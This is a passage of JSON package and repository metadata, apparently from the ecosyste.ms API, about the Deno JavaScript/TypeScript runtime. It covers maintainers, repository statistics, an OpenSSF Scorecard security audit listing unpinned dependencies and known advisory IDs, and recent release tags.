i/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T16:24:05.424Z","updated_at":"2022-11-07T16:24:05.424Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.886Z","updated_at":"2023-07-18T22:41:23.886Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4327637,"name":"deno","ecosystem":"deno","description":"A modern runtime for JavaScript and TypeScript.","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":303,"first_release_published_at":"2020-07-29T19:59:08.205Z","latest_release_published_at":"2025-08-21T12:18:02.362Z","latest_release_number":"v2.4.5","last_synced_at":"2026-09-07T22:53:47.577Z","created_at":"2022-04-21T03:02:16.651Z","updated_at":"2026-09-07T22:53:47.578Z","registry_url":"https://deno.land/x/deno","install_command":null,"documentation_url":"https://doc.deno.land/https://deno.land/x/deno/mod.ts","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hos